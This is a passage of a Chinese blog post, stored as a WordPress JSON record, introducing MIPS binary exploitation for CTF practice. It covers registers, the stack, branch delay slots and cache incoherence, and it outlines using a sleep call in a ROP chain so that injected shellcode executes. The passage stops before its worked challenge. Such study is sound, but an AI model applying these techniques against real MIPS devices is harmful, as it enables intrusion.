{"id":1039,"date":"2025-05-23T18:55:51","date_gmt":"2025-05-23T10:55:51","guid":{"rendered":"http:\/\/8.141.27.105\/?p=1039"},"modified":"2025-05-23T20:18:43","modified_gmt":"2025-05-23T12:18:43","slug":"%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/","title":{"rendered":"\u5f02\u67b6\u6784|MIPS\u67b6\u6784\u521d\u63a2"},"content":{"rendered":"\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/\">https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pocs.app\/exploiting-buffer-overflows-on-mips-architectures\">https:\/\/pocs.app\/exploiting-buffer-overflows-on-mips-architectures<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/migraine-sudo.github.io\/2021\/01\/30\/mips-pwn\">https:\/\/migraine-sudo.github.io\/2021\/01\/30\/mips-pwn<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#%E4%B8%89%E5%A4%A7%E6%9E%B6%E6%9E%84%E5%8C%BA%E5%88%AB\" title=\"\u4e09\u5927\u67b6\u6784\u533a\u522b\">\u4e09\u5927\u67b6\u6784\u533a\u522b<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E5%AF%84%E5%AD%98%E5%99%A8\" title=\"MIPS\u5bc4\u5b58\u5668\">MIPS\u5bc4\u5b58\u5668<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%92%8C%E4%BC%A0%E5%8F%82\" title=\"MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2\">MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%9A%84%E6%A0%88\" title=\"MIPS\u7684\u6808\">MIPS\u7684\u6808<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%9A%84%E7%89%B9%E7%82%B9\" title=\"MIPS\u7684\u7279\u70b9\">MIPS\u7684\u7279\u70b9<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#1%E3%80%81%E6%97%A0NX%EF%BC%88%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C%EF%BC%89\" title=\"1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09\">1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#2%E3%80%81%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0%E5%92%8C%E9%9D%9E%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0\" title=\"2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570\">2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#3%E3%80%81%E6%B5%81%E6%B0%B4%E7%BA%BF%E6%95%88%E5%BA%94\" title=\"3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94\">3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#4%E3%80%81%E7%BC%93%E5%AD%98%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7\" title=\"4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027\">4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#%E4%BE%8B%E9%A2%981_CTFSHOW_pwn341\" title=\"\u4f8b\u98981: CTFSHOW  pwn341\">\u4f8b\u98981: CTFSHOW  pwn341<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%B8%89%E5%A4%A7%E6%9E%B6%E6%9E%84%E5%8C%BA%E5%88%AB\"><\/span>\u4e09\u5927\u67b6\u6784\u533a\u522b<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u4e09\u5927\u67b6\u6784\uff1aMIPS\u3001ARM\u3001x86(x86-64)\uff0c\u63a5\u89e6\u5230\u7684\u5927\u90e8\u5206pwn\u9898\u90fd\u662fx86\u67b6\u6784\uff0c\u6240\u4ee5MIPS\u7b49\u5176\u4ed6\u67b6\u6784\u7684\u9898\u578b\u5c31\u88ab\u79f0\u4e3a\u5f02\u67b6\u6784\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/MFLSE45AYMVUYM6HEO9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"757\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/MFLSE45AYMVUYM6HEO9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1040\"  sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E5%AF%84%E5%AD%98%E5%99%A8\"><\/span>MIPS\u5bc4\u5b58\u5668<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>MIPS\u670932\u4f4d\u4e5f\u670964\u4f4d\uff0c\u5bc4\u5b58\u5668\u90fd\u4ee5$\u5f00\u5934\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$zero # \u6c38\u8fdc\u8fd4\u56de 0\u3002<\/li>\n\n\n\n<li>$v0 &#8211; $v1 # \u5b58\u50a8\u51fd\u6570\u8fd4\u56de\u503c\u3002<\/li>\n\n\n\n<li>$a0 &#8211; $a3 # \u7528\u4e8e\u51fd\u6570\u8c03\u7528\u65f6\u7684\u53c2\u6570\u4f20\u9012\uff0c\u82e5\u53c2\u6570\u8d85\u8fc7 <strong>4 \u4e2a<\/strong>\uff0c\u5219\u591a\u4f59\u7684\u53c2\u6570\u4f7f\u7528\u5806\u6808\u4f20\u9012\u3002<\/li>\n\n\n\n<li>$s0 &#8211; $s7 # \u5b58\u50a8\u5404\u79cd\u4e1c\u897f\uff0c\u51fd\u6570\u8c03\u7528\u65f6\u9700\u5c06\u7528\u5230\u7684\u5bc4\u5b58\u5668\u4fdd\u5b58\u5230\u5806\u6808\u3002<\/li>\n\n\n\n<li>$sp # \u6808\u6307\u9488\uff0c\u6307\u5411\u6808\u9876\u3002<\/li>\n\n\n\n<li>$ra # \u5b58\u50a8\u8fd4\u56de\u5730\u5740\u3002<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%92%8C%E4%BC%A0%E5%8F%82\"><\/span>MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>$v0 \u4fdd\u5b58\u9700\u8981\u6267\u884c\u7684\u7cfb\u7edf\u8c03\u7528\u7684\u8c03\u7528\u53f7\uff0c\u53c2\u6570 1 \uff5e 4 \u5206\u522b\u4fdd\u5b58\u5728 $a0 ~ $a3 \u5bc4\u5b58\u5668\u4e2d\uff0c\u5269\u4e0b\u7684\u53c2\u6570\u653e\u5728\u6808\u4e2d\uff0c\u8fd4\u56de\u503c\u4e5f\u5b58\u653e\u5728 $v0 \u4e2d\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E7%9A%84%E6%A0%88\"><\/span>MIPS\u7684\u6808<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u4e0ex86\u4e0d\u4e00\u6837\uff0cMIPS\u6ca1\u6709pop\u548cpush\u6307\u4ee4\uff0c\u901a\u8fc7 load \u6216\u8005 store \u6307\u4ee4\u8fdb\u884c\u5185\u5b58\u8bbf\u95ee\u7684\u65b9\u5f0f\u4f7f\u7528\u6808\u3002<\/p>\n\n\n\n<p>\u6808\u7684\u5173\u952e\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<p><strong><code>$sp<\/code>\uff08Stack Pointer\uff0c\u5bc4\u5b58\u566829\uff09<\/strong>\uff1a<br>\u59cb\u7ec8\u6307\u5411\u6808\u9876\uff08\u6808\u4ece\u9ad8\u5730\u5740\u5411\u4f4e\u5730\u5740\u751f\u957f\uff0c<code>push<\/code>\u65f6\u9012\u51cf\uff0c<code>pop<\/code>\u65f6\u9012\u589e\uff09\u3002<\/p>\n\n\n\n<p><strong><code>$fp<\/code>\uff08Frame Pointer\uff0c\u5bc4\u5b58\u566830\uff0c\u53ef\u9009\uff09<\/strong>\uff1a<br>\u7528\u4e8e\u6807\u8bb0\u5f53\u524d\u51fd\u6570\u7684\u6808\u5e27\u8d77\u59cb\u5730\u5740\uff0c\u4fbf\u4e8e\u8c03\u8bd5\u548c\u5c40\u90e8\u53d8\u91cf\u8bbf\u95ee\uff08\u7c7b\u4f3cx86\u7684<code>ebp<\/code>\uff09\u3002\u8be5\u5bc4\u5b58\u5668\u4e0d\u662f\u5fc5\u987b\u7684\uff0c\u56e0\u4e3aMIPS\u91c7\u7528<strong>\u504f\u79fb\u5bfb\u5740<\/strong>\u6765\u8bbf\u95ee\u53d8\u91cf\uff0c\u4ec5\u6709$sp\u4e5f\u80fd\u5b8c\u6210\u6808\u5e27\u7684\u7ef4\u62a4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"472\" height=\"496\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1043\"  sizes=\"auto, (max-width: 472px) 100vw, 472px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E7%9A%84%E7%89%B9%E7%82%B9\"><\/span>MIPS\u7684\u7279\u70b9<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1%E3%80%81%E6%97%A0NX%EF%BC%88%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C%EF%BC%89\"><\/span>1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u7531\u4e8eMIPS\u7684\u7279\u6027\uff0c\u5b83\u7684\u6808\/bss\u901a\u5e38\u90fd\u662f\u53ef\u6267\u884c\u7684\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2%E3%80%81%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0%E5%92%8C%E9%9D%9E%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0\"><\/span>2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>x86\u5728\u8c03\u7528\u51fd\u6570\u65f6\uff0c\u4f1a\u628a\u8c03\u7528\u8005\uff08caller\uff09\u7684<strong>bp\u548cret<\/strong>\uff08\u8fd4\u56de\u5730\u5740\uff09\u538b\u5165\u6808\u4e2d\u3002<\/p>\n\n\n\n<p>\u800cMIPS\u4e2d\u5219\u5206\u4e3a\u4e24\u79cd\u60c5\u51b5\uff1a<\/p>\n\n\n\n<p>\u5bf9\u4e8e<strong>\u53f6\u5b50\u51fd\u6570<\/strong>\uff08\u4e0d\u8c03\u7528\u5176\u4ed6\u51fd\u6570\uff09\uff0c\u51fd\u6570\uff08caller\uff09\u7684\u8fd4\u56de\u5730\u5740\u662f<strong>\u4e0d\u4f1a<\/strong>\u538b\u5165\u6808\u4e2d\u7684\uff0c\u800c\u662f\u4f1a\u76f4\u63a5\u5b58\u5165\u5bc4\u5b58\u5668$ra<strong>\u4e2d\u3002<\/strong><\/p>\n\n\n\n<p>\u5bf9\u4e8e<strong>\u975e\u53f6\u5b50\u51fd\u6570<\/strong>\uff08\u5373\u51fd\u6570\u4e2d\u8fd8\u8c03\u7528\u4e86\u5176\u4ed6\u51fd\u6570\uff09\uff0c\u5219\u548cx86\u7c7b\u4f3c\uff0c\u5c06\u51fd\u6570\uff08caller\uff09\u7684\u8fd4\u56de\u5730\u5740\u5b58\u5165\u6808\u4e2d\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"3%E3%80%81%E6%B5%81%E6%B0%B4%E7%BA%BF%E6%95%88%E5%BA%94\"><\/span>3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u672c\u5e94\u987a\u5e8f\u6267\u884c\u7684\u51e0\u6761\u6307\u4ee4\u540c\u65f6\u6267\u884c\uff0c\u53ea\u4e0d\u8fc7\u5904\u4e8e\u4e0d\u540c\u7684\u6267\u884c\u9636\u6bb5\uff08\u4e00\u822c\u6307\u4ee4\u6267\u884c\u9636\u6bb5\u5305\u62ec\uff1a\u53d6\u6307\u3001\u95f4\u6307\u3001\u6267\u884c\u3001\u4e2d\u65ad\uff09\u5982\u4e0b\u56fe\u6240\u793a\uff0c\u53c2\u8003\u4e8c\u6b21\u91cd\u53e0\u6267\u884c\u65b9\u5f0f\uff0c\u7b2c\u4e00\u6761\u6307\u4ee4\u5728\u6267\u884c\u65f6\u5019\uff0c\u7b2c\u4e8c\u6761\u6307\u4ee4\u5728\u5206\u6790\uff0c\u7b2c\u4e09\u6761\u6307\u4ee4\u5728\u53d6\u6307\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"696\" height=\"310\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1045\"  sizes=\"auto, (max-width: 696px) 100vw, 696px\" \/><\/div><\/figure>\n\n\n\n<p>\u901a\u5e38\u6765\u8bf4\uff0cMIPS\u89c4\u5b9a\uff0c\u5728\u5206\u652f\u6307\u4ee4\u6267\u884c\u524d\u4f1a\u5148\u6267\u884c\u5206\u652f\u6307\u4ee4\u540e\u9762\u4e00\u6761\u6307\u4ee4\uff0c\u8fd9\u6761\u6307\u4ee4\u88ab\u79f0\u4e3a<strong>\u5206\u652f\u5ef6\u8fdf\u69fd<\/strong>\u3002<\/p>\n\n\n\n<p>\u4e00\u4e2a\u4f8b\u5b50\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mov $a0,$s1\njalr strrchr   \/\/\u4f7f\u7528\u4e86$a0\u4f5c\u4e3a\u53c2\u6570\nmov $a0,$s0<\/code><\/pre>\n\n\n\n<p>\u8bf7\u95ee\u5728\u7b2c\u4e8c\u6b65\u65f6\uff0c$a0\u7684\u503c\u662f$s1\u8fd8\u662f$s0\uff1f<\/p>\n\n\n\n<p>\u7b54\u6848\uff1a\u7531\u4e8e\u6d41\u6c34\u7ebf\u6548\u5e94\uff0cmov $a0,$s0\u5b9e\u9645\u4e0a\u5728jalr strrchr\u524d\u88ab\u6267\u884c\uff0c\u6240\u4ee5\u5728\u7b2c\u4e8c\u6b65\u65f6\uff0c$a0\u7684\u503c\u662f$s0\u7684\u503c\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"4%E3%80%81%E7%BC%93%E5%AD%98%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7\"><\/span>4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u9996\u5148\u4e86\u89e3\u4e00\u4e0b\u54c8\u4f5b\u7ed3\u6784\u4e0e\u51af\u8bfa\u4f9d\u66fc\u7ed3\u6784\u7684\u533a\u522b\uff1a<\/p>\n\n\n\n<p>\u54c8\u4f5b\u7ed3\u6784\uff1a\u6307\u4ee4\u548c\u6570\u636e<strong>\u5206\u5f00<\/strong>\u5b58\u50a8<\/p>\n\n\n\n<p>\u51af\u8bfa\u4f9d\u66fc\u7ed3\u6784\uff1a\u6307\u4ee4\u548c\u6570\u636e<strong>\u4e0d\u5206\u5f00<\/strong>\uff0c\u5171\u4eab\u540c\u4e00\u5b58\u50a8\u7a7a\u95f4\u548c\u603b\u7ebf<\/p>\n\n\n\n<p>MIPS \u67b6\u6784\u91c7\u7528\u00a0<strong>\u54c8\u4f5b\u67b6\u6784\u7684\u7f13\u5b58\u8bbe\u8ba1<\/strong>\uff0c\u5373\u00a0<strong>\u6307\u4ee4\u7f13\u5b58Instruction cache\uff08I-Cache\uff09<\/strong>\u00a0\u548c\u00a0<strong>\u6570\u636e\u7f13\u5b58Data cache\uff08D-Cache\uff09<\/strong>\u00a0\u7269\u7406\u5206\u79bb\u3002\u8fd9\u79cd\u8bbe\u8ba1\u63d0\u9ad8\u4e86\u6307\u4ee4\u548c\u6570\u636e\u7684\u5e76\u884c\u8bbf\u95ee\u80fd\u529b\uff0c\u4f46\u4e5f\u5f15\u5165\u4e86\u00a0<strong>\u7f13\u5b58\u4e00\u81f4\u6027\u95ee\u9898<\/strong>\u3002<\/p>\n\n\n\n<p>\u5982\u56fe\u6240\u793a\uff0c I-Cache\u7f13\u5b58<strong>\u53ef\u6267\u884c\u6307\u4ee4<\/strong>\uff0cCPU \u53ea\u80fd\u4ece I-Cache \u4e2d\u53d6\u6307\u4ee4\u6267\u884c\u3002D-Cache\u7f13\u5b58<strong>\u7a0b\u5e8f\u6570\u636e<\/strong>\uff08\u5982\u6808\u3001\u5806\u3001\u5168\u5c40\u53d8\u91cf\u7b49\uff09\uff0c\u6240\u6709\u6570\u636e\u8bfb\u5199\u64cd\u4f5c\u90fd\u7ecf\u8fc7 D-Cache\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-2-1024x567.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"567\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-2-1024x567.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1046\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>MIPS \u901a\u5e38\u91c7\u7528\u00a0<strong>\u5199\u56de\uff08Write-Back\uff09\u7b56\u7565<\/strong>\uff0c\u5373\u4fee\u6539\u540e\u7684\u6570\u636e\u4e0d\u4f1a\u7acb\u5373\u540c\u6b65\u5230\u4e3b\u5b58\uff0c\u800c\u662f\u7559\u5728D-Cache \u4e2d\uff0c\u76f4\u5230\u88ab\u66ff\u6362\u6216\u663e\u5f0f\u5237\u65b0\u3002\u6240\u4ee5\u5199\u5165\u7684shellcode\u4e0d\u4f1a\u9a6c\u4e0a\u5b58\u5230I-Cache\u4e2d\u53bb\u6267\u884c\uff0c\u800c\u662f\u505c\u7559\u5728D-Cache\u4e2d\uff0c\u76f4\u5230\u4e3b\u5b58\uff08Memory\uff09\u5237\u65b0\u5bf9\u5e94\u5185\u5b58\u5757\uff0c<\/p>\n\n\n\n<p>\u6240\u4ee5\u5728\u5199exp\u7684\u65f6\u5019\uff0c\u901a\u5e38\u4f1a\u7528sleep\u51fd\u6570\u6765\u4f7f\u5f97shellcode\u4eceD-Cache\u5237\u65b0\u5230I-Cache\uff0c\u5426\u5219\u4f1a\u6267\u884c\u5931\u8d25\uff0c\u4e0d\u80fd\u50cfx86\u67b6\u6784\u4e0b\u76f4\u63a5\u8df3\u8f6c\u5230shellcode\uff0c\u800c\u662f\u9700\u8981\u6784\u9020\u4e00\u6761ROP\u94fe\uff0c\u5148\u8c03\u7528sleep\u51fd\u6570\uff0c\u7136\u540e\u518d\u8df3\u8f6c\u5230shellcode\u3002<\/p>\n\n\n\n<p>sleep\u51fd\u6570\u80fd\u89e3\u51b3 MIPS \u7f13\u5b58\u4e0d\u4e00\u81f4\u95ee\u9898\uff0c\u662f\u56e0\u4e3a\u5b83\u901a\u8fc7\u7cfb\u7edf\u8c03\u7528\u8fdb\u5165\u5185\u6838\u6001\uff0c\u89e6\u53d1\u64cd\u4f5c\u7cfb\u7edf\u7684\u7f13\u5b58\u7ef4\u62a4\u673a\u5236\uff1a\u5f3a\u5236 D-Cache \u5199\u56de\u5185\u5b58\u786e\u4fdd ShellCode \u540c\u6b65\uff0c\u5e76\u5931\u6548 I-Cache \u4f7f CPU \u91cd\u65b0\u52a0\u8f7d\u6307\u4ee4\uff0c\u4ece\u800c\u4fdd\u8bc1\u540e\u7eed\u6267\u884c\u7684\u4ee3\u7801\u662f\u6700\u65b0\u7684\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BE%8B%E9%A2%981_CTFSHOW_pwn341\"><\/span>\u4f8b\u98981: CTFSHOW  pwn341<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u903b\u8f91\u975e\u5e38\u7b80\u5355\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper 